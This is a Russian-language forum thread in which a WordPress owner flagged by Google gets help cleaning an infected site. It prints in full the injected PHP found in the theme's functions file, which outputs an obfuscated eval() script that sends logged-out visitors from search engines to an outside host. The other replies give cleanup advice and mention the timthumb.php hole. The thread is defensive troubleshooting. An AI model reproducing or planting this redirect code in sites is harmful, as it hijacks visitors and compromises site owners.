-
DONATE to NULLED!
Вы можете помочь Форуму и команде, поддержать финансово. starwanderer - модератор этого раздела будет Вам благодарен!
Помощь Google сетует на вирус на сайте
- Автор темы nizulko
- Дата начала
latteo
Эффективное использование PHP, MySQL
- Регистрация
- 27 Фев 2008
- Сообщения
- 1.603
- Реакции
- 1.565
Внизу страницы JS код, начинающийся с <script language="JavaScript">eval(function(p,a,c,k,e,r)
удали и будет тебе счастье через несколько дней, когда ПС переиндексирует сайт (в гугл вебмастерс кажется можно ускорить)
удали и будет тебе счастье через несколько дней, когда ПС переиндексирует сайт (в гугл вебмастерс кажется можно ускорить)
latteo
Эффективное использование PHP, MySQL
- Регистрация
- 27 Фев 2008
- Сообщения
- 1.603
- Реакции
- 1.565
Ты как проверяешь, что нет такого кода?
Вирусы нынче умные пошли, вполне возможно, что он не для всех выводится(фильр например по признаку залогининости в админ панель).
Пересмотри код шаблона, уделив особое внимание файлам footer и function, так же могут быть заражены плагины, вероятность заразы в других местах значительно ниже.
Прилагаю html копию страницы, password:123
Вирусы нынче умные пошли, вполне возможно, что он не для всех выводится(фильр например по признаку залогининости в админ панель).
Пересмотри код шаблона, уделив особое внимание файлам footer и function, так же могут быть заражены плагины, вероятность заразы в других местах значительно ниже.
Прилагаю html копию страницы, password:123
nizulko
Полезный
- Регистрация
- 5 Ноя 2007
- Сообщения
- 170
- Реакции
- 17
- Автор темы
- #5
Огромная благодарность. Нашел в файле с функциями такой кусок:
Вопрос - что делает, как и когда он мог туда залететь, если пару часов назад все было окей... или просто Гугл мне не говорил об этом?!
PHP:
<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>Вопрос - что делает, как и когда он мог туда залететь, если пару часов назад все было окей... или просто Гугл мне не говорил об этом?!
посмотри по дате последнего изменения в этом файле и поймёшь возможно когда его туда впихнули.
гугл мог не сразу определить, что это вирусняк.
Вариантов внедрения много от дырок в двиге или модов и до палева паролей для доступа к хостингу, фтп, админок...
Для начала поменяй все пароли доступа, а потом думай о наличии дырок. Могли также и через соседей залезать.
также шел советую поискать.
гугл мог не сразу определить, что это вирусняк.
Вариантов внедрения много от дырок в двиге или модов и до палева паролей для доступа к хостингу, фтп, админок...
Для начала поменяй все пароли доступа, а потом думай о наличии дырок. Могли также и через соседей залезать.
также шел советую поискать.
polyetilen
Заблокирован
- Регистрация
- 10 Авг 2006
- Сообщения
- 810
- Реакции
- 475
Видно используестя файл timthumb.php, который давно славится дыркой в безопасности, загружает всё подряд и картинки и php скрипты на сервер
wp-content/plugins/simple-post-thumbnails/timthumb.php
в новой версии исправлено
Для просмотра ссылки Войдиили Зарегистрируйся
надо версии сверить в начале файла
define ('VERSION', '...')
может через этот скрипт взломали.
Можно зарегестрироватся в google webmasters tools Для просмотра ссылки Войдиили Зарегистрируйся
там добавить свой сайт и в диагностике будет анализ про вредные скрипты и ссылки где находится, всё поисправлять поудалять, и отослать заявку что почищено всё.
там же на google webmasters tools
или тут
Для просмотра ссылки Войдиили Зарегистрируйся
ещё что делать
Для просмотра ссылки Войдиили Зарегистрируйся
Для просмотра ссылки Войдиили Зарегистрируйся
ещё тут полно сканеров
Для просмотра ссылки Войдиили Зарегистрируйся
например
Для просмотра ссылки Войдиили Зарегистрируйся
найден вредный скрипт в конце страницы
wp-content/plugins/simple-post-thumbnails/timthumb.php
в новой версии исправлено
Для просмотра ссылки Войди
надо версии сверить в начале файла
define ('VERSION', '...')
может через этот скрипт взломали.
Можно зарегестрироватся в google webmasters tools Для просмотра ссылки Войди
там добавить свой сайт и в диагностике будет анализ про вредные скрипты и ссылки где находится, всё поисправлять поудалять, и отослать заявку что почищено всё.
там же на google webmasters tools
или тут
Для просмотра ссылки Войди
ещё что делать
Для просмотра ссылки Войди
Для просмотра ссылки Войди
ещё тут полно сканеров
Для просмотра ссылки Войди
например
Для просмотра ссылки Войди
найден вредный скрипт в конце страницы
latteo
Эффективное использование PHP, MySQL
- Регистрация
- 27 Фев 2008
- Сообщения
- 1.603
- Реакции
- 1.565
Eset обзывает его redirector - редирект на другой сайт происходит при скрипта выполнении.
Бан не сразу снимают, а в течении некоторого времени от нескольких дней до нескольких недель.
Чуть выше polyetilen хорошо расписал как можно скорить выход из бана.
- Статус